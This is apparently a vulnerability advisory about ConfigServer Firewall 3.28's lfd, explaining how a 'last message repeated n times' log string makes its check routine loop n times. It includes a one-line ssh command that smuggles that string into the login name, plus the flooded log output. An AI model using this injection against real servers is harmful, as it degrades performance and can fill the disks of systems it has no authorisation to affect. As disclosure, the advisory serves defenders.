WebhostSecurity.com
ARTICLES
› Lessons Learned - Defense
› Lessons Learned - Offense
› Finding Bugs 1 - Softaculous
› Finding Bugs 2 - cPanel + Horde
› uid/gid Reuse Multi Vendor Issue
› Finding the WordPress 2.1.1 Backdoor
› Discovering Cdorked.A on cPanel
OFFENSE
› AtMail
› BFD
› cPanel
› CSF
› DirectAdmin
› Installatron
› Juniper
› Kloxo
› OSSEC
› Softaculous
› WHMEZLogin
› WHMReseller
DEFENSE
› STFN - Suspicious /tmp File Notifier
› ELM - Exim Log Monitor
› RFID - Remote File Inclusion Detector
› Twitter


CSF 3.28 - remote, unauthenticated users can cause prolonged, excessive CPU, disk I/O, and disk space usage, severely degrading server performance


DESCRIPTION

lfd in ConfigServer Firewall 3.28 has a subroutine called dochecks() which examines log files for various patterns of undesirable behavior. If a log line contains the string "last message repeated n times" (where "n" is 1 or more numbers), the dochecks() subroutine will be executed "n" times.

The logic looks similar to this:

 521         for my $log_line ( @logs ) {
 522             if ( $line and $log_line =~ /last message repeated (\d+) times/ ) {
 523                 for ( 1 .. $1 ) {
 524                     do_checks( $line, $logfile );
 525                 }
 526             }
 527         }

A remote user can cause the dochecks() subroutine to be ran as many times as they'd like by injecting the "last message repeated" string into one of the monitored log files.

The following steps can be used to take advantage of this issue:

[user@host ~]$ ssh -l 'last message repeated 999999999999999999999999999999999999999 times' victim


The following will be written to /var/log/lfd.log over and over:

Sat May 17 20:57:21 2008 lfd: Failed SSH login from x.x.x.x - 1 failure(s) in the last 20 secs
Sat May 17 20:57:21 2008 lfd: Failed SSH login from x.x.x.x - 2 failure(s) in the last 20 secs
Sat May 17 20:57:21 2008 lfd: Failed SSH login from x.x.x.x - 3 failure(s) in the last 20 secs
Sat May 17 20:57:21 2008 lfd: Failed SSH login from x.x.x.x - 4 failure(s) in the last 20 secs
Sat May 17 20:57:21 2008 lfd: Failed SSH login from x.x.x.x - 5 failure(s) in the last 20 secs
Sat May 17 20:57:21 2008 lfd: 5 login failures from x.x.x.x within the last 20 seconds - already blocked


This will cause lfd.pl to gradually consume more and more CPU. lfd.log can grow at speeds of 1MB/s or more, depending on the server environment and activity. This was also presumed to work via ftpd, but no other daemons were tested.


IMPACT

Remote, unauthenticated users can severely degrade server performance, possibly filling the disk.


WebhostSecurity.com © 2009 - 2020